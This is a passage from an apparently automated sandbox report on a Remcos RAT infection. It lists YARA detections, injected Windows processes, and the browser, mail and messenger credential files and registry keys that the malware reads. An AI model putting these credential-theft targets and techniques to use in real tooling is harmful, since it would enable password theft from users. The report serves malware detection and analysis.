Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_0044844E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 62_2_0045245A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 62_2_00452583
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 62_2_0045268A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 62_2_00452757
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 62_2_00448937
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 62_2_00451E1F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 62_2_068797C5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 62_2_06883411
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 62_2_068835E5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 62_2_06883518
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_068792DC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 62_2_068832E8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 62_2_068400F9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_0688300B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_06882F25
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 62_2_06882F70
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 62_2_06882CAD
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\recover.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B08B38 GetLocalTime, 26_2_02B08B38
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B19F00 GetUserNameA, 26_2_02B19F00
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 62_2_004491DA
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0B038 GetVersionExA, 26_2_02B0B038
Source: C:\Windows\SysWOW64\colorcpl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 62_2_0040B59B
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 62_2_0040B6B5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 62_2_0040B6B5
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\SysWOW64\recover.exe Code function: ESMTPPassword 49_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 49_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 49_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 35.3.colorcpl.exe.2ef626a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: recover.exe PID: 4564, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-14MUP4 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-14MUP4
Yara detected Remcos RAT
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 62_2_00405091